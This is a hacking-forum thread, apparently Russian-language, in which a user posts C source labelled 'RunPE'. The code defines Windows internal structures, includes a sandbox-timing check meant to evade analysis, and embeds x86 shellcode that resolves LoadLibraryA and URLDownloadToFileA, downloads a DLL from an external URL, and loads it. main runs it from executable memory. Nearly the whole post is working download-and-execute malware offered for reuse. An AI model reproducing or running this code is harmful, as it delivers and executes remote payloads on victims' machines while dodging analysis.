1. Все файлы исключительно загружать на наш сервер в формате .rar или .zip, темы где будут указаны ссылки для загрузки файлов будут удалены.

Source RunPE Source

Тема в разделе "C / C# / C++", создана пользователем hackerpro, 12 ноя 2015.

  1. hackerpro
    Статус
    Оффлайн
    Сообщения:
    443
    Симпатии:
    644
    Код:
    #include <Windows.h>
    
    #define MM_SHARED_USER_DATA 0x7FFE0000
    
    typedef enum _NT_PRODUCT_TYPE
    {
        NtProductWinNt = 1,
        NtProductLanManNt = 2,
        NtProductServer = 3
    } NT_PRODUCT_TYPE;
    
    typedef enum _ALTERNATIVE_ARCHITECTURE_TYPE
    {
        StandardDesign = 0,
        NEC98x86 = 1,
        EndAlternatives = 2
    } ALTERNATIVE_ARCHITECTURE_TYPE;
    
    typedef struct _KSYSTEM_TIME
    {
        ULONG LowPart;
        LONG High1Time;
        LONG High2Time;
    } KSYSTEM_TIME, *PKSYSTEM_TIME;
    
    typedef struct _KUSER_SHARED_DATA
    {
        ULONG TickCountLowDeprecated;
        ULONG TickCountMultiplier;
        KSYSTEM_TIME InterruptTime;
        KSYSTEM_TIME SystemTime;
        KSYSTEM_TIME TimeZoneBias;
        WORD ImageNumberLow;
        WORD ImageNumberHigh;
        WCHAR NtSystemRoot[260];
        ULONG MaxStackTraceDepth;
        ULONG CryptoExponent;
        ULONG TimeZoneId;
        ULONG LargePageMinimum;
        ULONG Reserved2[7];
        NT_PRODUCT_TYPE NtProductType;
        UCHAR ProductTypeIsValid;
        ULONG NtMajorVersion;
        ULONG NtMinorVersion;
        UCHAR ProcessorFeatures[64];
        ULONG Reserved1;
        ULONG Reserved3;
        ULONG TimeSlip;
        ALTERNATIVE_ARCHITECTURE_TYPE AlternativeArchitecture;
        LARGE_INTEGER SystemExpirationDate;
        ULONG SuiteMask;
        UCHAR KdDebuggerEnabled;
        UCHAR NXSupportPolicy;
        ULONG ActiveConsoleId;
        ULONG DismountCount;
        ULONG ComPlusPackage;
        ULONG LastSystemRITEventTickCount;
        ULONG NumberOfPhysicalPages;
        UCHAR SafeBootMode;
        ULONG SharedDataFlags;
        ULONG DbgErrorPortPresent : 1;
        ULONG DbgElevationEnabled : 1;
        ULONG DbgVirtEnabled : 1;
        ULONG DbgInstallerDetectEnabled : 1;
        ULONG SystemDllRelocated : 1;
        ULONG SpareBits : 27;
        UINT64 TestRetInstruction;
        ULONG SystemCall;
        ULONG SystemCallReturn;
        UINT64 SystemCallPad[3];
        union
        {
            KSYSTEM_TIME TickCount;
            UINT64 TickCountQuad;
        };
        ULONG Cookie;
        INT64 ConsoleSessionForegroundProcessId;
        ULONG Wow64SharedInformation[16];
        WORD UserModeGlobalLogger[8];
        ULONG HeapTracingPid[2];
        ULONG CritSecTracingPid[2];
        ULONG ImageFileExecutionOptions;
        union
        {
            UINT64 AffinityPad;
            ULONG ActiveProcessorAffinity;
        };
        UINT64 InterruptTimeBias;
    } KUSER_SHARED_DATA, *PKUSER_SHARED_DATA;
    
    ULONG InternalGetTickCount() {
    
        PKUSER_SHARED_DATA SharedUserData = (PKUSER_SHARED_DATA)MM_SHARED_USER_DATA;
    
        ULARGE_INTEGER TickCount;
    
        while (TRUE) {
            TickCount.HighPart = (ULONG)SharedUserData->TickCount.High1Time;
            TickCount.LowPart = SharedUserData->TickCount.LowPart;
    
            if (TickCount.HighPart == (ULONG)SharedUserData->TickCount.High2Time)
                break;
    
            YieldProcessor();
        }
    
        ULONG tick1 = ((unsigned __int64)(unsigned int)(TickCount.LowPart)*(unsigned __int64)(unsigned int)(SharedUserData->TickCountMultiplier) >> 24);
        ULONG tick2 = ((unsigned __int64)(unsigned int)((TickCount.HighPart << 8) & 0xFFFFFFFF)*(unsigned __int64)(unsigned int)(SharedUserData->TickCountMultiplier));
    
        return tick1 + tick2;
    }
    
    unsigned char shellcode[] =
    "\x31\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B\x70\x14\xAD\x96\xAD\x8B"
    "\x58\x10\x8B\x53\x3C\x01\xDA\x8B\x52\x78\x01\xDA\x8B\x72\x20\x01"
    "\xDE\x31\xC9\x41\xAD\x01\xD8\x81\x38\x47\x65\x74\x50\x0F\x85\xF0"
    "\xFF\xFF\xFF\x81\x78\x04\x72\x6F\x63\x41\x0F\x85\xE3\xFF\xFF\xFF"
    "\x81\x78\x08\x64\x64\x72\x65\x0F\x85\xD6\xFF\xFF\xFF\x8B\x72\x24"
    "\x01\xDE\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x01\xDE\x8B\x14\x8E\x01"
    "\xDA\x31\xC9\x51\x68\x2E\x64\x6C\x6C\x68\x64\x65\x61\x64\x53\x52"
    "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F\x61\x64"
    "\x54\x53\xFF\xD2\x83\xC4\x0C\x59\x50\x89\x45\xFC\x51\x66\xB9\x6C"
    "\x6C\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD0\x83"
    "\xC4\x10\x8B\x54\x24\x04\x31\xC9\x51\x66\xB9\x65\x41\x51\x31\xC9"
    "\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64\x54\x68\x6F\x77\x6E\x6C\x68"
    "\x55\x52\x4C\x44\x54\x50\xFF\xD2\x31\xC9\x8D\x54\x24\x24\x51\x51"
    "\x52\xEB\x1F\x51\xFF\xD0\x83\xC4\x1C\x31\xC0\x50\x68\x2E\x64\x6C"
    "\x6C\x68\x64\x65\x61\x64\x54\x8B\x45\xFC\xFF\xD0\x90\xE9\xFA\xFF"
    "\xFF\xFF\xE8\xDC\xFF\xFF\xFF"
    "https://rstforums.com/fisiere/dead.dll"
    "\x00";
    
    int main(void) {
    
        /*
        DWORD dwMilliSec = 500;
    
        ULONG InternalTickCountA = InternalGetTickCount();
        ULONG TickCountA = GetTickCount();
    
        Sleep(dwMilliSec); // Replace with code or something
    
        ULONG InternalTickCountB = InternalGetTickCount();
        ULONG TickCountB = GetTickCount();
    
        if (InternalTickCountB - InternalTickCountA != TickCountB - TickCountA)
        {
            return 0;
        }
        */
    
        // https://dl.packetstormsecurity.net/shellcode/downloadload-shellcode.txt
        {
            void(*pfunc)();
            void* lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
            memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1);
            pfunc = (void(*)())lpAlloc;
            pfunc();
        }
    
        return 0;
    }
     
    DarkCoderSc и Anubis нравится это.

Пользователи просматривающие тему (Пользователей: 0, Гостей: 0)